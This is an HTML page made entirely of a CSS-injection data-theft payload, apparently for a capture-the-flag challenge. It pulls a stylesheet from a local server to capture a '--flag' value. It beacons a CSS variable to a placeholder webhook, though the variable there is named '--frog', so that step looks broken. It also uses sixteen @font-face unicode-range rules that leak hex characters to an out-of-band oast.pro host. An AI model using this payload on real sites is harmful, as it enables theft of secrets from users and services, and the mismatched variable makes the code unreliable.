<html>
<head>
    <link rel="stylesheet" type="text/css" href="http://127.0.0.1:80/css?prefix=p{--flag:" />
</head>
<body>
<p id="asdf"></p>
<style>
    #asdf{
      background-image:url("https://WEBHOOK.DOMAIN/?" var(--frog));
      width:1px; height:1px;         
    }
    
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/0");unicode-range:U+0030}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/1");unicode-range:U+0031}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/2");unicode-range:U+0032}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/3");unicode-range:U+0033}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/4");unicode-range:U+0034}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/5");unicode-range:U+0035}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/6");unicode-range:U+0036}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/7");unicode-range:U+0037}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/8");unicode-range:U+0038}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/9");unicode-range:U+0039}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/A");unicode-range:U+0041}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/B");unicode-range:U+0042}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/C");unicode-range:U+0043}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/D");unicode-range:U+0044}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/E");unicode-range:U+0045}
    @font-face{font-family:leak;src:url("http://d0vcz24z1wg0000z8qs0gopsxtyyyyyyb.oast.pro/F");unicode-range:U+0046}
</style>
</body>
</html>
